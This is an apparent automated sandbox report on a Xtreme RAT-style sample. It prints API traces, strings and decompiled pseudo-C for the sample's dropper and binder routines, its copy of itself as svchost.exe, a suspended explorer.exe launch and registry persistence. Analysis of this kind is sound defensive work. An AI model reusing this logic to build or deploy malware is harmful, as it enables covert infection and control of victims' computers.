Part of subcall function 00C83420: GetCommandLineW.KERNEL32(00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C8346A

Part of subcall function 00C83A54: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C83A65
Part of subcall function 00C83A54: Process32FirstW.KERNEL32(00000000,?), ref: 00C83A7A
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83A94
Part of subcall function 00C83A54: CharUpperW.USER32(00000000), ref: 00C83AA4
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ABF
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ACA
Part of subcall function 00C83A54: Process32NextW.KERNEL32(00000000,?), ref: 00C83AEC
Part of subcall function 00C83A54: CloseHandle.KERNEL32(00000000), ref: 00C83AF6

Strings

Mutex, xrefs: 00C8A489
Software\Microsoft\Active Setup\Installed Components\, xrefs: 00C8A11C
SOFTWARE\, xrefs: 00C8A472
.xtr, xrefs: 00C8A3C2
explorer.exe, xrefs: 00C8A383
local, xrefs: 00C8A3EF
svchost.exe, xrefs: 00C8A196
InstalledServer, xrefs: 00C8A0D9
SOFTWARE\, xrefs: 00C8A0CD
XTREME, xrefs: 00C8A42F

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C840F8, Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 293

C-Code - Quality: 45%

			E00C840F8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v1308;
				void _v6188;
				char _v6740;
				char _v6744;
				char _v6748;
				char _v6752;
				char _v6756;
				char _v6760;
				char _v6764;
				char _v6768;
				char _v6772;
				char _v6776;
				char _v6780;
				char _v6784;
				char _v6788;
				char _v6792;
				char _v6796;
				char _v6800;
				char _v6804;
				char _v6808;
				char _t110;
				char _t115;
				void* _t122;
				char _t130;
				void* _t203;
				char* _t206;
				void* _t207;
				void* _t223;
				void* _t225;
				void* _t227;
				void* _t229;
				intOrPtr _t237;
				char _t250;
				void* _t251;
				void* _t258;
				void* _t274;
				void* _t278;
				short* _t282;
				short* _t284;
				void* _t286;
				void* _t287;

				_t286 = _t287;
				_t207 = 0x352;
				goto L1;
				L4:
				E00C81DBC(_v8, 0);
				if(0 == 0) {
					L29:
					_pop(_t237);
					 *[fs:eax] = _t237;
					_push(E00C84541);
					E00C81B90( &_v6808, 0x11);
					return E00C81B90( &_v16, 3);
				} else {
					while(1) {
						E00C81DBC(_v8, 0);
						if(0 == 0) {
							goto L29;
						}
						E00C81B78( &_v16);
						E00C81B78( &_v12);
						E00C8291C();
						E00C82914(_t206, E00C81CF4(_v8));
						E00C81E8C( &_v8, 0x228, 1, __eflags);
						E00C81E40(_v8, E00C8214C( *((intOrPtr*)(_t206 + 0x210)),  *((intOrPtr*)(_t206 + 0x214)), 2, 0), 1, __eflags,  &_v16);
						E00C81E8C( &_v8, E00C8214C( *((intOrPtr*)(_t206 + 0x210)),  *((intOrPtr*)(_t206 + 0x214)), 2, 0), 1, __eflags);
						__eflags =  *((char*)(_t206 + 0x220));
						if(__eflags != 0) {
							L9:
							_t110 =  *((intOrPtr*)(_t206 + 0x218));
							__eflags = _t110;
							if(_t110 != 0) {
								__eflags = _t110 - 1;
								if(_t110 != 1) {
									__eflags = _t110 - 2;
									if(_t110 != 2) {
										__eflags = _t110 - 3;
										if(_t110 != 3) {
											__eflags = _t110 - 4;
											if(__eflags == 0) {
												__eflags = E00C83100();
												if(__eflags != 0) {
													E00C81C90( &_v6788, E00C833A8(E00C83100(), 0xc84580, __eflags));
													_push(_v6788);
													E00C81CD8( &_v6792, 0x105, _t206);
													_pop(_t258);
													E00C81D10( &_v12, _v6792, _t258, __eflags);
												}
											}
										} else {
											E00C81CD8( &_v6780, 0x105, _t206);
											_push(_v6780);
											E00C81C90( &_v6784, E00C82FE0());
											_pop(_t223);
											E00C81D10( &_v12, _t223, _v6784, __eflags);
										}
									} else {
										E00C81CD8( &_v6772, 0x105, _t206);
										_push(_v6772);
										E00C81C90( &_v6776, E00C83060(_t206));
										_pop(_t225);
										E00C81D10( &_v12, _t225, _v6776, __eflags);
									}
								} else {
									E00C81CD8( &_v6764, 0x105, _t206);
									_push(_v6764);
									E00C83034();
									E00C81C90( &_v6768, _v6764);
									_pop(_t227);
									E00C81D10( &_v12, _t227, _v6768, __eflags);
								}
							} else {
								E00C81CD8( &_v6756, 0x105, _t206);
								_push(_v6756);
								E00C81C90( &_v6760, E00C83008());
								_pop(_t229);
								E00C81D10( &_v12, _t229, _v6760, __eflags);
							}
							E00C81D10( &_v6796, L".exe", _v12, __eflags);
							_t115 = E00C83218(E00C81CF4(_v6796), E00C84578, 4, 0); // executed
							__eflags = _t115;
							if(__eflags != 0) {
								_t250 = _v12;
								E00C81D10( &_v6808, L".xtr", _t250, __eflags);
								DeleteFileW(E00C81CF4(_v6808)); // executed
							} else {
								E00C81C90( &_v6800, E00C833A8(E00C82FE0(), 0xc84580, __eflags));
								_push(_v6800);
								E00C81CD8( &_v6804, 0x105, _t206);
								_pop(_t250);
								E00C81D10( &_v12, _v6804, _t250, __eflags);
							}
							_t122 = E00C81D04(_v16);
							asm("cdq");
							_push(_t250);
							_push(_t122 + _t122);
							_push(E00C81CF4(_v16));
							_t284 = E00C81CF4(_v12);
							_pop(_t251); // executed
							E00C83218(_t284, _t251); // executed
							_t130 =  *((intOrPtr*)(_t206 + 0x21c));
							__eflags = _t130 - 2;
							if(_t130 != 2) {
								__eflags = _t130 - 1;
								if(_t130 != 1) {
									__eflags = _t130;
									if(_t130 == 0) {
										ShellExecuteW(0, L"open", _t284, 0, 0, 1);
									}
								} else {
									ShellExecuteW(0, L"open", _t284, 0, 0, 0); // executed
								}
							}
							continue;
						}
						_push(0);
						_push( &_v6744);
						E00C81C90( &_v6748, E00C833A8(L"SOFTWARE\\",  &_v1308, __eflags));
						_push(_v6748);
						E00C81CD8( &_v6752, 0x105, _t206);
						_pop(_t274);
						E00C82E70(0x80000001, _t206, _v6752, _t274, _t284);
						E00C81DBC(_v6744, 0xc84570);
						if(__eflags == 0) {
							continue;
						} else {
							E00C82F90(0x80000001, E00C833A8(L"SOFTWARE\\",  &_v1308, __eflags), __eflags, 2, E00C84578);
							goto L9;
						}
					}
					goto L29;
				}
				L1:
				_push(0);
				_push(0);
				_t207 = _t207 - 1;
				if(_t207 != 0) {
					goto L1;
				} else {
					_push(_t207);
					_t284 = __eax;
					memcpy( &_v6188, __eax, 0x607 << 2);
					_t282 =  &(_t284[0x607]);
					_t206 =  &_v6740;
					_push(_t286);
					_push(0xc8453a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t287 + 0xc;
					E00C8406C( &_v8);
					E00C81DBC(_v8, 0);
					if(0 != 0) {
						_push(E00C81D04(_v8) + _t200);
						_t203 = E00C81CF4(_v8);
						_pop(_t278);
						E00C82B90(_t203, _t206, L"BINDER", _t278, _t282, _t284, E00C81D04(_v8) + _t200);
					}
					goto L4;
				}
			}

0x00c840f9
0x00c840fb
0x00c840fb
0x00c84160
0x00c84165
0x00c8416a
0x00c8450f
0x00c84511
0x00c84514
0x00c84517
0x00c84527
0x00c84539
0x00c84170
0x00c844ff
0x00c84504
0x00c84509
0x00000000
0x00000000
0x00c84178
0x00c84180
0x00c8418c
0x00c841a2
0x00c841b4
0x00c841dc
0x00c84200
0x00c84205
0x00c8420c
0x00c8429d
0x00c8429d
0x00c842a3
0x00c842a5
0x00c842e6
0x00c842e9
0x00c8432a
0x00c8432d
0x00c8436e
0x00c84371
0x00c843af
0x00c843b2
0x00c843b9
0x00c843bb
0x00c843d4
0x00c843df
0x00c843ed
0x00c843fb
0x00c843fc
0x00c843fc
0x00c843bb
0x00c84373
0x00c84380
0x00c8438b
0x00c84399
0x00c843a7
0x00c843a8
0x00c843a8
0x00c8432f
0x00c8433c
0x00c84347
0x00c84355
0x00c84363
0x00c84364
0x00c84364
0x00c842eb
0x00c842f8
0x00c84303
0x00c84304
0x00c84311
0x00c8431f
0x00c84320
0x00c84320
0x00c842a7
0x00c842b4
0x00c842bf
0x00c842cd
0x00c842db
0x00c842dc
0x00c842dc
0x00c84413
0x00c84428
0x00c8442d
0x00c8442f
0x00c84482
0x00c84485
0x00c84496
0x00c84431
0x00c84448
0x00c84453
0x00c84461
0x00c8446f
0x00c84470
0x00c84470
0x00c8449e
0x00c844a5
0x00c844a6
0x00c844a7
0x00c844b0
0x00c844b9
0x00c844bd
0x00c844be
0x00c844c3
0x00c844c9
0x00c844cc
0x00c844ce
0x00c844d1
0x00c844e8
0x00c844ea
0x00c844fa
0x00c844fa
0x00c844d3
0x00c844e1
0x00c844e1
0x00c844d1
0x00000000
0x00c844cc
0x00c84212
0x00c8421a
0x00c84233
0x00c8423e
0x00c8424c
0x00c8425c
0x00c8425d
0x00c8426d
0x00c84272
0x00000000
0x00c84278
0x00c84298
0x00000000
0x00c84298
0x00c84272
0x00000000
0x00c844ff
0x00c84100
0x00c84100
0x00c84102
0x00c84104
0x00c84105
0x00000000
0x00c84107
0x00c84107
0x00c8410b
0x00c84118
0x00c84118
0x00c8411a
0x00c84122
0x00c84123
0x00c84128
0x00c8412b
0x00c84131
0x00c8413b
0x00c84140
0x00c8414c
0x00c84150
0x00c8415a
0x00c8415b
0x00c8415b
0x00000000
0x00c84140

APIs

Part of subcall function 00C8406C: FindResourceW.KERNEL32(00C80000,XTREMEBINDER,0000000A), ref: 00C84086
Part of subcall function 00C8406C: SizeofResource.KERNEL32(00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A,?,00000000,00000001,00000000), ref: 00C84094
Part of subcall function 00C8406C: LoadResource.KERNEL32(00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A,?,00000000), ref: 00C840A2
Part of subcall function 00C8406C: LockResource.KERNEL32(00000000,00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A), ref: 00C840AA
Part of subcall function 00C8406C: FreeResource.KERNEL32(00000000,00000000,00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A), ref: 00C840D1

Part of subcall function 00C81B78: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86

DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,00C8453A,?,00000000,00000001,00000000,00000351,00000000), ref: 00C84496

Part of subcall function 00C83008: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00C83018

Part of subcall function 00C82E70: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C,?), ref: 00C82EC5
Part of subcall function 00C82E70: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C,?), ref: 00C82EE9
Part of subcall function 00C82E70: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 00C82F1A
Part of subcall function 00C82E70: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C), ref: 00C82F23

Part of subcall function 00C82F90: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
Part of subcall function 00C82F90: RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,?,00000000,ServerStarted,?,00C89F0A,00000002,00C8F8B4,00000000,00000000), ref: 00C82FBF
Part of subcall function 00C82F90: RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,?,00000000,ServerStarted,?,00C89F0A,00000002,00C8F8B4,00000000), ref: 00C82FCE

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C844E1

Part of subcall function 00C83060: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00C8FAC0,00000000,00C8498E,00000000,00C84B74,?,00C8E07C,?,00000000), ref: 00C83077

Part of subcall function 00C83034: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C83044

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00C844FA

Part of subcall function 00C82FE0: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C849F0,00000000,00C84B74,?,00C8E07C,?,00000000), ref: 00C82FEF
Part of subcall function 00C82FE0: GetTempPathW.KERNEL32(00000104,00000000), ref: 00C82FFC

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

.exe, xrefs: 00C8440B
open, xrefs: 00C844DA, 00C844F3
BINDER, xrefs: 00C84155
SOFTWARE\, xrefs: 00C84221, 00C84285
.xtr, xrefs: 00C8447D

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C83094, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32

C-Code - Quality: 100%

			E00C83094() {
				void* _t3;
				short* _t5;
				WCHAR* _t9;
				short* _t11;
				void* _t12;

				_t9 = E00C833A8(E00C82FE0(), L"x.html", _t12);
				_t3 = CreateFileW(_t9, 0x40000000, 2, 0, 2, 0x80, 0); // executed
				CloseHandle(_t3);
				_t5 = VirtualAlloc(0, 0x208, 0x1000, 4); // executed
				_t11 = _t5;
				FindExecutableW(_t9, 0, _t11); // executed
				DeleteFileW(_t9); // executed
				return _t11;
			}

0x00c830a5
0x00c830ba
0x00c830c0
0x00c830d3
0x00c830d8
0x00c830de
0x00c830e4
0x00c830ed

APIs

Part of subcall function 00C82FE0: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C849F0,00000000,00C84B74,?,00C8E07C,?,00000000), ref: 00C82FEF
Part of subcall function 00C82FE0: GetTempPathW.KERNEL32(00000104,00000000), ref: 00C82FFC

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00C830BA
CloseHandle.KERNEL32(00000000), ref: 00C830C0
VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302,00000002), ref: 00C830D3
FindExecutableW.SHELL32(00000000,00000000,00000000), ref: 00C830DE
DeleteFileW.KERNEL32(00000000,00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302), ref: 00C830E4

Strings

x.html, xrefs: 00C8309B

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C84914, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00C84914(void* __eax, intOrPtr __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v1520;
				char _v1542;
				char _v1564;
				char _v1566;
				void _v6176;
				char _v6180;
				char _v6184;
				intOrPtr _t29;
				void* _t35;
				void* _t39;
				int _t45;
				void* _t55;
				int _t61;
				intOrPtr _t85;
				void* _t87;
				intOrPtr _t102;
				void* _t106;
				WCHAR* _t131;
				void* _t134;

				_t101 = __edx;
				_t85 = __ebx;
				_push(__eax);
				_push(__ebx);
				_v6184 = 0;
				_v6180 = 0;
				_t131 = memcpy( &_v6176, __edx, 0x607 << 2);
				_push(_t134);
				_push(0xc84b74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t134 + 0xffffffffffffe7ec;
				if(_v1566 == 0) {
					L26:
					_pop(_t102);
					 *[fs:eax] = _t102;
					_push(E00C84B7B);
					return E00C81770( &_v6184, 2);
				} else {
					_t29 = _v1520;
					if(_t29 != 0) {
						__eflags = _t29 - 1;
						if(_t29 != 1) {
							__eflags = _t29 - 2;
							if(_t29 != 2) {
								__eflags = _t29 - 3;
								if(_t29 != 3) {
									__eflags = _t29 - 4;
									if(__eflags != 0) {
										__eflags = _t29 - 5;
										if(_t29 == 5) {
											_t85 = E00C82FE0();
										}
									} else {
										_t85 = E00C833A8(E00C8310C(), E00C84B84, __eflags);
									}
								} else {
									__eflags = E00C83100();
									if(__eflags == 0) {
										_t85 = E00C833A8(E00C8310C(), E00C84B84, __eflags);
									} else {
										_t85 = E00C833A8(E00C83100(), E00C84B84, __eflags);
									}
								}
							} else {
								_t85 = E00C83060(_t101);
							}
						} else {
							E00C83034();
							_t85 = _t29;
						}
					} else {
						_t85 = E00C83008();
					}
					E00C81970( &_v6180, 0xb,  &_v1542);
					_t140 = _v6180;
					if(_v6180 != 0) {
						_t85 = E00C833A8(E00C833A8(_t85,  &_v1542, _t140), E00C84B84, _t140);
					}
					_push(E00C833A8(_t85,  &_v1564, _t140));
					_t35 = E00C82E48(_t131);
					_pop(_t106);
					if(E00C83960(_t131, _t35 + _t35, _t106) != 1) {
						_t39 = E00C834C4(_t85);
						_t142 = _t39;
						if(_t39 != 0) {
							SetFileAttributesW(E00C833A8(_t85,  &_v1564, _t142), 0x80); // executed
							_t45 = CopyFileW(_t131, E00C833A8(_t85,  &_v1564, _t142), 0); // executed
							asm("sbb eax, eax");
							_t144 = _t45 + 1;
							if(_t45 + 1 != 0) {
								E00C833A8(_t85,  &_v1564, __eflags);
							} else {
								_t87 = E00C833A8(E00C8310C(), E00C84B84, _t144);
								E00C81970( &_v6184, 0xb,  &_v1542);
								_t145 = _v6184;
								if(_v6184 != 0) {
									_t87 = E00C833A8(E00C833A8(_t87,  &_v1542, _t145), E00C84B84, _t145);
								}
								_t55 = E00C834C4(_t87);
								_t146 = _t55;
								if(_t55 != 0) {
									SetFileAttributesW(E00C833A8(_t87,  &_v1564, _t146), 0x80);
									_t61 = CopyFileW(_t131, E00C833A8(_t87,  &_v1564, _t146), 0);
									asm("sbb eax, eax");
									_t148 = _t61 + 1;
									if(_t61 + 1 != 0) {
										E00C833A8(_t87,  &_v1564, _t148);
									}
								}
							}
						}
					}
					goto L26;
				}
			}

0x00c84914
0x00c84914
0x00c8491d
0x00c84924
0x00c84929
0x00c8492f
0x00c84944
0x00c84948
0x00c84949
0x00c8494e
0x00c84951
0x00c8495d
0x00c84b56
0x00c84b58
0x00c84b5b
0x00c84b5e
0x00c84b73
0x00c84963
0x00c84963
0x00c8496b
0x00c84976
0x00c84979
0x00c84984
0x00c84987
0x00c84992
0x00c84995
0x00c849ca
0x00c849cd
0x00c849e6
0x00c849e9
0x00c849f0
0x00c849f0
0x00c849cf
0x00c849e2
0x00c849e2
0x00c84997
0x00c8499c
0x00c8499e
0x00c849c6
0x00c849a0
0x00c849af
0x00c849af
0x00c8499e
0x00c84989
0x00c8498e
0x00c8498e
0x00c8497b
0x00c8497b
0x00c84980
0x00c84980
0x00c8496d
0x00c84972
0x00c84972
0x00c84a03
0x00c84a08
0x00c84a0f
0x00c84a2c
0x00c84a2c
0x00c84a3b
0x00c84a3e
0x00c84a49
0x00c84a51
0x00c84a59
0x00c84a5e
0x00c84a60
0x00c84a79
0x00c84a8f
0x00c84a97
0x00c84a9a
0x00c84a9c
0x00c84b4f
0x00c84aa2
0x00c84ab5
0x00c84ac8
0x00c84acd
0x00c84ad4
0x00c84af1
0x00c84af1
0x00c84af5
0x00c84afa
0x00c84afc
0x00c84b11
0x00c84b27
0x00c84b2f
0x00c84b32
0x00c84b34
0x00c84b3e
0x00c84b43
0x00c84b34
0x00c84afc
0x00c84a9c
0x00c84a60
0x00000000
0x00c84a51

APIs

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000080), ref: 00C84B11

Part of subcall function 00C83060: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,svchost.exe,00000000,00C8498E,00000000,00C84B74,?,00C8E07C,00000000,00000000), ref: 00C83077

Part of subcall function 00C83034: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C83044

CopyFileW.KERNEL32(svchost.exe,00000000,00000000), ref: 00C84B27

Part of subcall function 00C82FE0: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C849F0,00000000,00C84B74,?,00C8E07C,00000000,00000000), ref: 00C82FEF
Part of subcall function 00C82FE0: GetTempPathW.KERNEL32(00000104,00000000), ref: 00C82FFC

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00C84A79
CopyFileW.KERNEL32(svchost.exe,00000000,00000000), ref: 00C84A8F

Part of subcall function 00C83008: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00C83018

Strings

svchost.exe, xrefs: 00C8491D, 00C84A8E, 00C84B26

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C83EA8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74
processsleep

C-Code - Quality: 100%

			E00C83EA8(WCHAR* __eax, struct _PROCESS_INFORMATION* __edx, void* __ebp) {
				struct _STARTUPINFOW _v80;
				int _t8;
				void* _t12;
				struct _PROCESS_INFORMATION* _t27;
				WCHAR* _t35;
				void* _t36;

				_t27 = __edx;
				_t35 = __eax;
				_t36 = 0;
				E00C8291C();
				_t8 = CreateProcessW(0, _t35, 0, 0, 0, 4, 0, 0,  &_v80, __edx); // executed
				if(_t8 != 0) {
					_t36 = _t27->hProcess;
					E00C83D8C();
					_t12 = E00C83E00(_t27->dwProcessId); // executed
					_t40 = _t12 - 1;
					if(_t12 == 1) {
						TerminateProcess(_t27->hProcess, 0);
						E00C8291C();
						E00C8291C();
						if(CreateProcessW(0, E00C833A8(L"explorer.exe", 0xc83f74, _t40), 0, 0, 0, 4, 0, 0,  &_v80, _t27) == 0) {
							E00C8291C();
							E00C8291C();
							_t36 = 0;
							__eflags = 0;
						} else {
							_t36 =  *_t27;
						}
					}
					Sleep(0x64); // executed
				}
				return _t36;
			}

0x00c83eae
0x00c83eb0
0x00c83eb2
0x00c83ebb
0x00c83ed5
0x00c83edc
0x00c83ee2
0x00c83ee4
0x00c83eec
0x00c83ef1
0x00c83ef3
0x00c83efa
0x00c83f06
0x00c83f12
0x00c83f42
0x00c83f4f
0x00c83f5b
0x00c83f60
0x00c83f60
0x00c83f44
0x00c83f44
0x00c83f44
0x00c83f42
0x00c83f64
0x00c83f64
0x00c83f71

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83ED5

Part of subcall function 00C83D8C: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C83D95
Part of subcall function 00C83D8C: GetProcAddress.KERNEL32(?,IsWow64Process,00000000,00C83DD5,?,?,?,00C83EE9), ref: 00C83DB4
Part of subcall function 00C83D8C: FreeLibrary.KERNEL32(?,00C83DDC,00C83DD5,?,?,?,00C83EE9), ref: 00C83DCF

Part of subcall function 00C83E00: GetCurrentProcess.KERNEL32(?,00C91F1C), ref: 00C83E1E
Part of subcall function 00C83E00: IsWow64Process.KERNELBASE(00000000,?,00C91F1C), ref: 00C83E24
Part of subcall function 00C83E00: OpenProcess.KERNEL32(00000400,00000000,?), ref: 00C83E46
Part of subcall function 00C83E00: CloseHandle.KERNEL32(?), ref: 00C83E92

TerminateProcess.KERNEL32(00000000,00000000), ref: 00C83EFA

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83F3B
Sleep.KERNEL32(00000064), ref: 00C83F64

Strings

explorer.exe, xrefs: 00C83F2E

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C83E00, Relevance: 7.6, APIs: 5, Instructions: 60

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,00C91F1C), ref: 00C83E1E
IsWow64Process.KERNELBASE(00000000,?,00C91F1C), ref: 00C83E24
OpenProcess.KERNEL32(00000400,00000000,00000E70), ref: 00C83E46
IsWow64Process.KERNEL32(?,?,00000000,00C83E98,?,00000400,00000000,00000E70), ref: 00C83E6A
CloseHandle.KERNEL32(?), ref: 00C83E92

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C82F90, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
registry

C-Code - Quality: 100%

			E00C82F90(void* __eax, short* __edx, void* __eflags, int _a4, char* _a8) {
				void* _v8;
				long _t13;
				void* _t17;
				short* _t18;
				char* _t22;

				_t22 = _a8;
				_t17 = 0;
				RegCreateKeyW(__eax, __edx,  &_v8); // executed
				_t13 = RegSetValueExW(_v8, _t18, 0, _a4, _t22, E00C82E48(_t22) + _t9); // executed
				if(_t13 == 0) {
					_t17 = 1;
				}
				RegCloseKey(_v8);
				return _t17;
			}

0x00c82f99
0x00c82f9c
0x00c82fa4
0x00c82fbf
0x00c82fc6
0x00c82fc8
0x00c82fc8
0x00c82fce
0x00c82fda

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,?,00000000,ServerStarted,?,00C89F0A,00000002,00C8F8B4,00000000,00000000), ref: 00C82FBF
RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,?,00000000,ServerStarted,?,00C89F0A,00000002,00C8F8B4,00000000), ref: 00C82FCE

Strings

ServerStarted, xrefs: 00C82F93, 00C82FBA

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
